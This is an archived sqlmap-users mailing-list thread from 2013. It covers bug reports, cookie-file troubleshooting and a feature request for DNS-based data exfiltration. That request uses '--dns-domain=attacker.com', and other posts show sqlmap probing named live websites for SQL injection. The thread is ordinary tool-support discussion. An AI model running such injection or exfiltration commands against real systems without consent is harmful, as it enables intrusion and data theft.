-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Hi, in cases where sqlmap is run against targets on internal networks it would be great if one could tell sqlmap to simply proceed without expecting incoming DNS requests, because sqlmap can not be executed directly on the DNS server (which can't reach the target, but the target can reach the DNS server). For me it would be enough to simply run something like - -u ... --dns-domain=attacker.com --dns-port=0 (--dns-port does not exist [yet]) to let sqlmap know that it doesn't need to start a DNS listener. I would then collect and decode the DNS querries on the DNS server manually, but I could also envision running a second sqlmap instance on the DNS server with --dns-domain (but without -u) doing that job. -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJRbcIPAAoJEJeRHQyF0ukM/VwQAKlZKRyuk55ZbiOzbRPztw/p dGHg7KLwPJ5fM9uXDNodO7cdZF18x6EJOjTJwu6sRNvUwjiAWb7VwAB6HLcts8Qf WXQL5OUBEzJiYJ/XUVZonPvw+PGc781rNTJDnbW3RKSQK8Hd7T5TgfDE0ucqTCRz cJ1NbcDswrCQNZtKr09SRW9kxk1QfHsbAGfQYpQh0LrIR3cTageFPLJ+hosMF+VU uoEiu6k9JJwbWlKCMu2uz/UrLRqdt7VtjhkpbLSLMBL/IOnfTHfdQ37NRYcJIkos D/sZIyA0MT/woN25rVVDAhxwVZ2MFcxn7eMKXZCxv5VpXZKQxeMtew8maDBwom5C JdM+bF6AoE56zqi/+qaYajPmO0GYQXy26YUhbRJUufF2ThSTTWnmgZ8QH6fKUbfN QTGbXyH/FbaXDMDokEButCcrD1PCpvklfz44VU7zi0zG/wBN+mnleT24bvW1tbhx J1vCEbXWEFCfxwCqTDopLHaGNkIlo4oH4PUsIyW1FlTYQRqH5cUe2bV1F0XcP3/O yNyHZmLMGtPdEvJ+Wkx8Bp4gcUC2ikKlS6H85TMDu6GxS5oi7EK+kGnJ+njhPeaF plSWWJFQHEm0DJ/ZCGjgzZyvS8QzK7WDfplpR/TBrc3uOLXZVqDhPW4IkLLc49Vz N5xHRCVPLLSrPfTPiyIJ =JSkD -----END PGP SIGNATURE----- |
|
From: buawig <bu...@gm...> - 2013-04-16 21:27:50
|
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Hi, I just wanted to request a "extension" for a previous feature request (DNS exfiltration [1]) but after looking at my former feature request I realized that it included already the feature I was about to request: - --dns-domain for non-root users: - --dns-port The use-case is mentioned in the former feature request: [1] http://sourceforge.net/mailarchive/message.php?msg_id=27108100 -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJRbcGHAAoJEJeRHQyF0ukM58gP/1o1qTQTI9bzk3Ez+2wcqign F0BlB//+rB6CzBPsEvkRioefbJPIcbX9Kcq+IqDygtk8/ux9uR3s1nKyps6nmvY6 EXi4EY0e8uMPc2oXGkMVie1UOYvKiW7apnEEOoIgymLpx/UiXhu3fcjkVymIem7w obHpd1pu+oIdXyt006yQDZzr9LRT1j/7mXF4fQ0kwrNJuRx+x/LUpRIoHrmn+JOC VWn29ayUaK7+si1xilibMaOuUPk6Q/4mURoptXJ0DfPbXkk9z7+Zwz8ga30I8xZB qpJtVpK/jxZAR8Bhc+SbKMNGSWDUlf8dweohRVFEYd6Bl0xZU4vbOF2WB9+z/0Go kK7850lyldD+a1G/ilqr1IpyoV3Pxx11D0Kwg8ARoKUKosqjh02rgJQ/GLTJjgJj QZmaDvVcV2NCeUKEJInR4BRVZDWqBVmA44ltfuswOEpz7pLo6oiz/3ZXyg0ad2m7 775afpHgFslt2NsjVz1aU+B531Iglwx/8uuLkwtP30lWscp6Ng3GkB4MM+U7yM8d tSXDlHmVxsJbBxX9rFy5KyRSrdyoQwdwqKyCmBpke/MyLz/NnLMolQUsk239Ljv+ ztA2EcK44MGuA5Rnr5uSmBoM6ZCB950JAjw2irvDBqpjfgD/T+lvc1MLcVykNu45 W8t1vxN9utvoag/kIeKJ =UXOD -----END PGP SIGNATURE----- |
|
From: Miroslav S. <mir...@gm...> - 2013-04-16 12:33:42
|
Hi Vladimir. Find it "patched" with the latest commit [1]. Basically, those combinations should not be allowed (-d and --url; -d and --tor; etc.) and now we've added new option validation checks for this kind of cases. Kind regards, Miroslav Stampar [1] https://github.com/sqlmapproject/sqlmap/commit/c73489aff3861f1cac7de41494a296c1095e141a On Tue, Apr 16, 2013 at 12:12 AM, Владимир Якимов <vo...@s2...> wrote: > Hi! > > This bug detected if add direct param. > > python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u " > http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables > --exclude-sysdbs > > > [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, retry > your run with the latest development version from the GitHub repository. If > the exception persists, please send by e-mail to ' > sql...@li...' or open a new issue at ' > https://github.com/sqlmapproject/sqlmap/issues/new' with the following > text and any information required to reproduce the bug. The developers will > try to reproduce the bug, fix it accordingly and get back to you. > sqlmap version: 1.0-dev-de99717 > Python version: 2.7.3 > Operating system: posix > Command line: sqlmap.py -d > **************************************************** -u > http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor > --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables > --exclude-sysdbs > Technique: None > Back-end DBMS: MySQL (identified) > Traceback (most recent call last): > File "sqlmap.py", line 87, in main > start() > File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in > start > action() > File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action > setHandler() > File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in > setHandler > conf.dbmsConnector.connect() > File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in > connect > self.connector = pymysql.connect(host=self.hostname, user=self.user, > passwd=self.password, db=self.db, port=self.port, > connect_timeout=conf.timeout, use_unicode=True) > File > "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py", > line 93, in Connect > return Connection(*args, **kwargs) > File > "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", > line 584, in __init__ > self._connect() > File > "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", > line 739, in _connect > sock.connect((self.host, self.port)) > File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in > connect > raise GeneralProxyError((5, _generalerrors[5])) > GeneralProxyError: (5, 'bad input') > > > > ------------------------------------------------------------------------------ > Precog is a next-generation analytics platform capable of advanced > analytics on semi-structured data. The platform includes APIs for building > apps and a phenomenal toolset for data science. Developers can use > our toolset for easy data analysis & visualization. Get a free account! > http://www2.precog.com/precogplatform/slashdotnewsletter > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2013-04-16 12:19:26
|
Hi. Thank you for your report and find it fixed with the latest commit [1]. Kind regards, Miroslav Stampar [1] https://github.com/sqlmapproject/sqlmap/commit/6fed1921edf1baaf23a54fbe340ff3781fc05c86 On Mon, Apr 15, 2013 at 11:01 PM, <co...@5i...> wrote: > Hello, > the --host doesn't work as expected, or I am doing something wrong: > > > this works as expected: > > ./sqlmap.py --url='http://i.csland.ro/index.php?id=0' > > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database > takeover tool > http://sqlmap.org > > [!] legal disclaimer: Usage of sqlmap for attacking targets without > prior mutual consent is illegal. It is the end user's responsibility to > obey all applicable local, state and federal laws. Developers assume no > liability and are not responsible for any misuse or damage caused by > this program > > [*] starting at 23:57:15 > > [23:57:15] [INFO] testing connection to the target URL > [23:57:15] [INFO] heuristics detected web page charset 'ascii' > [23:57:15] [INFO] testing if the target URL is stable. This can take a > couple of seconds > [23:57:16] [INFO] target URL is stable > [23:57:16] [INFO] testing if GET parameter 'id' is dynamic > [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic > [23:57:16] [INFO] GET parameter 'id' is dynamic > [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id' > might be injectable (possible DBMS: 'MySQL') > [23:57:16] [INFO] testing for SQL injection on GET parameter 'id' > > > .... > > > this doesn't work as expected: > > ./sqlmap.py --host='i.csland.ro' > --url='http://188.240.236.15/index.php?id=0' > > sqlmap/1.0-dev-840ee26 - automatic SQL injection and database > takeover tool > http://sqlmap.org > > [!] legal disclaimer: Usage of sqlmap for attacking targets without > prior mutual consent is illegal. It is the end user's responsibility to > obey all applicable local, state and federal laws. Developers assume no > liability and are not responsible for any misuse or damage caused by > this program > > [*] starting at 23:58:03 > > [23:58:03] [INFO] testing connection to the target URL > [23:58:03] [CRITICAL] page not found (404) > it is not recommended to continue in this kind of cases. Do you want to > quit and make sure that everything is set up properly? [Y/n] > [23:58:05] [WARNING] HTTP error codes detected during run: > > ............ > > > Of course i.csland.ro resolves to 188.240.236.15. Any idea? > > Thanks. > > > > ------------------------------------------------------------------------------ > Precog is a next-generation analytics platform capable of advanced > analytics on semi-structured data. The platform includes APIs for building > apps and a phenomenal toolset for data science. Developers can use > our toolset for easy data analysis & visualization. Get a free account! > http://www2.precog.com/precogplatform/slashdotnewsletter > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar http://about.me/stamparm |
|
From: Владимир Я. <vo...@s2...> - 2013-04-15 23:11:52
|
Hi! This bug detected if add direct param. python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables --exclude-sysdbs [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 1.0-dev-de99717 Python version: 2.7.3 Operating system: posix Command line: sqlmap.py -d **************************************************** -u http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables --exclude-sysdbs Technique: None Back-end DBMS: MySQL (identified) Traceback (most recent call last): File "sqlmap.py", line 87, in main start() File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in start action() File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action setHandler() File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in setHandler conf.dbmsConnector.connect() File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in connect self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True) File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py", line 93, in Connect return Connection(*args, **kwargs) File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", line 584, in __init__ self._connect() File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", line 739, in _connect sock.connect((self.host, self.port)) File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in connect raise GeneralProxyError((5, _generalerrors[5])) GeneralProxyError: (5, 'bad input') |
|
From: <co...@5i...> - 2013-04-15 21:17:46
|
Hello, the --host doesn't work as expected, or I am doing something wrong: this works as expected: ./sqlmap.py --url='http://i.csland.ro/index.php?id=0' sqlmap/1.0-dev-840ee26 - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 23:57:15 [23:57:15] [INFO] testing connection to the target URL [23:57:15] [INFO] heuristics detected web page charset 'ascii' [23:57:15] [INFO] testing if the target URL is stable. This can take a couple of seconds [23:57:16] [INFO] target URL is stable [23:57:16] [INFO] testing if GET parameter 'id' is dynamic [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic [23:57:16] [INFO] GET parameter 'id' is dynamic [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') [23:57:16] [INFO] testing for SQL injection on GET parameter 'id' .... this doesn't work as expected: ./sqlmap.py --host='i.csland.ro' --url='http://188.240.236.15/index.php?id=0' sqlmap/1.0-dev-840ee26 - automatic SQL injection and database takeover tool http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 23:58:03 [23:58:03] [INFO] testing connection to the target URL [23:58:03] [CRITICAL] page not found (404) it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] [23:58:05] [WARNING] HTTP error codes detected during run: ............ Of course i.csland.ro resolves to 188.240.236.15. Any idea? Thanks. |
|
From: Dirk W. <sp...@dr...> - 2013-04-15 10:19:25
|
Hi Miroslav,
On 04/15/2013 11:45 AM, Miroslav Stampar wrote:
> Hi Dirk.
>
> Now that crash should be "patched".
>
> Could you please retry it now and say if the latest revision suits your needs?
cool, thx. Works!
However (sorry):
One needs to omit the cookie in the request header, otherwise it just uses the one
supplied by the request.
Then: It doesn't change the cookie. Maybe I was interpreting that not correctly
but my point was using the load-cookies option to direct sqlmap to change
cookies once in a while (whenever that's gonna be). This is to circumvent
restrictions one can encounter otherwise....
Cheers,
Dirk
>
> Kind regards,
> Miroslav Stampar
>
>
> On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...>> wrote:
>
>
>
> On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> > Nevertheless, with the latest commit that check should be "neutralized" now. Could you please retry it now?
>
> thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib hiccups, using the same file:
>
> /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
> Traceback (most recent call last):
> File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in _really_load
> assert domain_specified == initial_dot
> AssertionError
>
> _warn_unhandled_exception()
> [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1': '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>
> the 999.. looks strange to me.
>
> >
> >
> > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <mir...@gm... <mailto:mir...@gm...> <mailto:mir...@gm... <mailto:mir...@gm...>>> wrote:
> >
> > Hi Dirk.
> >
> > Well, I would say that you have an expired cookie. Do you see that value 0? That value should be a valid UNIX time representing time of cookie expiration. Also, I've just tested that cookie of yours and sqlmap says: "[WARNING] cookie '....' has expired"
> >
>
> that's true but IMO 0 represents just a session cookie. Example:
>
> prompt% wget -q -O /dev/null --keep-session-cookies --save-cookies=/dev/stdout bing.com <http://bing.com>
> # HTTP cookie file.
> # Generated by Wget on 2013-04-15 11:23:13.
> # Edit at your own risk.
>
> .bing.com <http://bing.com> TRUE / FALSE 1429089794 SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415
> .bing.com <http://bing.com> TRUE / FALSE 1429089794 SRCHD D=2781203&MS=2781203&AF=NOFORM
> .bing.com <http://bing.com> TRUE / FALSE 1429089794 OrigMUID 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
> .bing.com <http://bing.com> TRUE / FALSE 1429089794 MUID 333995A69E06630B2EB491169F016314
> .bing.com <http://bing.com> TRUE / FALSE 0 _SS SID=B954CB7EDF8643CABAD8013F27A241E7
> .bing.com <http://bing.com> TRUE / FALSE 0 _HOP
> .bing.com <http://bing.com> TRUE / FALSE 0 _FS NU=1
> .bing.com <http://bing.com> TRUE / FALSE 1429089794 _FP EM=1
> www.bing.com <http://www.bing.com> FALSE / FALSE 1429089794 SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D
> www.bing.com <http://www.bing.com> FALSE / FALSE 1429089794 MUIDB 333995A69E06630B2EB491169F016314
>
> prompt%
>
> Same parser problem btw if I edit the cookie file and put 1429089794 unix time instead of 0 in there.
>
> Ok: With the prev rev ed5599f it reads this file ok (no session cookies but cookies w/ expiration date) and uses the last
> cookie only for the first 120 tries.
>
> Cheers, Dirk
>
>
> >
> > Kind regards,
> > Miroslav Stampar
> >
> >
> > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>> wrote:
> >
> >
> > Hi Miroslav,
> >
> > thx for your prompt answer.
> >
> > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
> > > Hi Dirk.
> > >
> > > Could you please get the latest revision and retry it again?
> > ed5599f: almost the same: with cookie in the header sqlmap takes only this one.
> > The slight difference seems to be that in the case where I didn't supply a cookie
> > sqlmap doesn't use any cookie at all, i.e. now not the one from the server anymore.
> > >
> > > There was a situation where info messages have been wrongly written that original response contained Set-Cookie in situations like yours.
> > >
> > > In case that everything stays as it is, I'll need to ask you to provide more details. For example, cookie file would be great.
> >
> > sure, here you go:
> >
> > --snip
> > # Netscape HTTP Cookie File
> > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie>
> > [..]
> > --snap
> >
> > They are all session cookies. For easier reading here I put some blanks in the line
> > above, in "cookie-file" there aren't any though. Cookies were generated with
> > stompy and a shell script (looks he same as with
> > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file> <URL>)
> >
> > Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
> >
> > >
> > > Also, please make sure that the cookie file contains proper cookie(s) - domain name should be the same as a domain of target, cookie needs to have a proper valid time, etc.
> >
> > see above.
> >
> > Cheers,
> >
> > Dirk
> >
> > >
> > >
> > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
> > >
> > > Hi Miroslav,
> > >
> > > yes unfortunately.
> > >
> > > If I omit the cookie line in the request header completely, sqlmap
> > > seems to take the first cookie issued by the server with set-cookie (and
> > > put's it silently in).
> > >
> > > Cheers,
> > >
> > > Dirk
> > >
> > >
> > >
> > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
> > > > Hi.
> > > >
> > > > And this is also happening if you are skipping "Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
> > > >
> > > > Kind regards,
> > > > Miroslav Stampar
> > > >
> > > >
> > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>>>> wrote:
> > > >
> > > >
> > > > Hi folks,
> > > >
> > > > .... that doesn't work for me. It always uses the cookie supplied
> > > > (below in $REQUEST, or if I omit the line in $REQUEST the one
> > > > from the 1st server reply is being used)
> > > >
> > > > So what is wrong in here:
> > > >
> > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
> > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
> > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
> > > > --level=2 --risk=2 -r $REQUEST
> > > >
> > > > The content of the file $REQUEST is:
> > > >
> > > > POST <URL> HTTP/1.1
> > > > Host: <HOST>
> > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko)
> > > > Chrome/0.2.149.6 <http://0.2.149.6> <http://0.2.149.6> <http://0.2.149.6> <http://0.2.149.6> Safari/525.13
> > > > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> > > > Accept-Language: en-US,en;q=0.5
> > > > Accept-Encoding: gzip, deflate
> > > > Referer: <Referer>
> > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
> > > > Connection: keep-alive
> > > > Content-Type: application/x-www-form-urlencoded
> > > > Content-Length: 67
> > > >
> > > > <abunchofpostparams>
> > > >
> > > >
> > > > No hints that cookie-file is not in correct format (I've been through this,
> > > > at least I think I so ;) ).
> > > >
> > > > Any insight would be much appreciated.
> > > >
> > > >
> > > > Cheers,
> > > >
> > > > Dirk
> > > >
> > > >
> > > > ------------------------------------------------------------------------------
> > > > Precog is a next-generation analytics platform capable of advanced
> > > > analytics on semi-structured data. The platform includes APIs for building
> > > > apps and a phenomenal toolset for data science. Developers can use
> > > > our toolset for easy data analysis & visualization. Get a free account!
> > > > http://www2.precog.com/precogplatform/slashdotnewsletter
> > > > _______________________________________________
> > > > sqlmap-users mailing list
> > > > sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>> <mailto:sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>>> <mailto:sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>> <mailto:sql...@li... <mailto:sql...@li...> <mailto:sql...@li... <mailto:sql...@li...>>>>
> > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> > > >
> > > >
> > > >
> > > >
> > > > --
> > > > Miroslav Stampar
> > > > http://about.me/stamparm
> > >
> > >
> > >
> > >
> > > --
> > > Miroslav Stampar
> > > http://about.me/stamparm
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
|
|
From: Miroslav S. <mir...@gm...> - 2013-04-15 09:46:30
|
Hi Brandon. Thank you for your patch and find it now included [1]. Kind regards, Miroslav Stampar [1] https://github.com/sqlmapproject/sqlmap/commit/8853e43616e89f26cfd6d1c1540e02ed6b4ca224 On Sat, Apr 13, 2013 at 8:36 PM, Brandon Perry <bpe...@gm...>wrote: > Hi, the attached patch fixes an issue with the /task/<task_id>/delete api > call when self.output_directory is NoneType and clean_system() is called. > > -- > http://volatile-minds.blogspot.com -- blog > http://www.volatileminds.net -- website > > > ------------------------------------------------------------------------------ > Precog is a next-generation analytics platform capable of advanced > analytics on semi-structured data. The platform includes APIs for building > apps and a phenomenal toolset for data science. Developers can use > our toolset for easy data analysis & visualization. Get a free account! > http://www2.precog.com/precogplatform/slashdotnewsletter > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
|
From: Miroslav S. <mir...@gm...> - 2013-04-15 09:45:28
|
Hi Dirk.
Now that crash should be "patched".
Could you please retry it now and say if the latest revision suits your
needs?
Kind regards,
Miroslav Stampar
On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...> wrote:
>
>
> On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> > Nevertheless, with the latest commit that check should be "neutralized"
> now. Could you please retry it now?
>
> thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib
> hiccups, using the same file:
>
> /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
> Traceback (most recent call last):
> File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
> _really_load
> assert domain_specified == initial_dot
> AssertionError
>
> _warn_unhandled_exception()
> [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid
> Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>
> the 999.. looks strange to me.
>
> >
> >
> > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
> mir...@gm... <mailto:mir...@gm...>> wrote:
> >
> > Hi Dirk.
> >
> > Well, I would say that you have an expired cookie. Do you see that
> value 0? That value should be a valid UNIX time representing time of cookie
> expiration. Also, I've just tested that cookie of yours and sqlmap says:
> "[WARNING] cookie '....' has expired"
> >
>
> that's true but IMO 0 represents just a session cookie. Example:
>
> prompt% wget -q -O /dev/null --keep-session-cookies
> --save-cookies=/dev/stdout bing.com
> # HTTP cookie file.
> # Generated by Wget on 2013-04-15 11:23:13.
> # Edit at your own risk.
>
> .bing.com TRUE / FALSE 1429089794 SRCHUSR
> AUTOREDIR=0&GEOVAR=&DOB=20130415
> .bing.com TRUE / FALSE 1429089794 SRCHD
> D=2781203&MS=2781203&AF=NOFORM
> .bing.com TRUE / FALSE 1429089794 OrigMUID
> 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
> .bing.com TRUE / FALSE 1429089794 MUID
> 333995A69E06630B2EB491169F016314
> .bing.com TRUE / FALSE 0 _SS
> SID=B954CB7EDF8643CABAD8013F27A241E7
> .bing.com TRUE / FALSE 0 _HOP
> .bing.com TRUE / FALSE 0 _FS NU=1
> .bing.com TRUE / FALSE 1429089794 _FP EM=1
> www.bing.com FALSE / FALSE 1429089794 SRCHUID
> V=2&GUID=975091780DFF407DA9DD07139FD97C4D
> www.bing.com FALSE / FALSE 1429089794 MUIDB
> 333995A69E06630B2EB491169F016314
>
> prompt%
>
> Same parser problem btw if I edit the cookie file and put 1429089794 unix
> time instead of 0 in there.
>
> Ok: With the prev rev ed5599f it reads this file ok (no session cookies
> but cookies w/ expiration date) and uses the last
> cookie only for the first 120 tries.
>
> Cheers, Dirk
>
>
> >
> > Kind regards,
> > Miroslav Stampar
> >
> >
> > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...<mailto:
> sp...@dr...>> wrote:
> >
> >
> > Hi Miroslav,
> >
> > thx for your prompt answer.
> >
> > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
> > > Hi Dirk.
> > >
> > > Could you please get the latest revision and retry it again?
> > ed5599f: almost the same: with cookie in the header sqlmap takes
> only this one.
> > The slight difference seems to be that in the case where I
> didn't supply a cookie
> > sqlmap doesn't use any cookie at all, i.e. now not the one from
> the server anymore.
> > >
> > > There was a situation where info messages have been wrongly
> written that original response contained Set-Cookie in situations like
> yours.
> > >
> > > In case that everything stays as it is, I'll need to ask you
> to provide more details. For example, cookie file would be great.
> >
> > sure, here you go:
> >
> > --snip
> > # Netscape HTTP Cookie File
> > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID
> \t <Cookie>
> > [..]
> > --snap
> >
> > They are all session cookies. For easier reading here I put some
> blanks in the line
> > above, in "cookie-file" there aren't any though. Cookies were
> generated with
> > stompy and a shell script (looks he same as with
> > wget -S -O /dev/null --keep-session-cookies
> --save-cookies=<file> <URL>)
> >
> > Again: sqlmap doesn't hiccup/complain while eating my cookies
> file ;-)
> >
> > >
> > > Also, please make sure that the cookie file contains proper
> cookie(s) - domain name should be the same as a domain of target, cookie
> needs to have a proper valid time, etc.
> >
> > see above.
> >
> > Cheers,
> >
> > Dirk
> >
> > >
> > >
> > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>>> wrote:
> > >
> > > Hi Miroslav,
> > >
> > > yes unfortunately.
> > >
> > > If I omit the cookie line in the request header
> completely, sqlmap
> > > seems to take the first cookie issued by the server with
> set-cookie (and
> > > put's it silently in).
> > >
> > > Cheers,
> > >
> > > Dirk
> > >
> > >
> > >
> > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
> > > > Hi.
> > > >
> > > > And this is also happening if you are skipping "Cookie:
> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
> > > >
> > > > Kind regards,
> > > > Miroslav Stampar
> > > >
> > > >
> > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <
> sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr...<mailto:
> sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...>
> <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
> > > >
> > > >
> > > > Hi folks,
> > > >
> > > > .... that doesn't work for me. It always uses the
> cookie supplied
> > > > (below in $REQUEST, or if I omit the line in
> $REQUEST the one
> > > > from the 1st server reply is being used)
> > > >
> > > > So what is wrong in here:
> > > >
> > > > cd
> ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
> > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
> > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
> > > > --level=2 --risk=2 -r $REQUEST
> > > >
> > > > The content of the file $REQUEST is:
> > > >
> > > > POST <URL> HTTP/1.1
> > > > Host: <HOST>
> > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2;
> en-US) AppleWebKit/525.13 (KHTML, like Gecko)
> > > > Chrome/0.2.149.6 <http://0.2.149.6> <
> http://0.2.149.6> <http://0.2.149.6> Safari/525.13
> > > > Accept:
> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> > > > Accept-Language: en-US,en;q=0.5
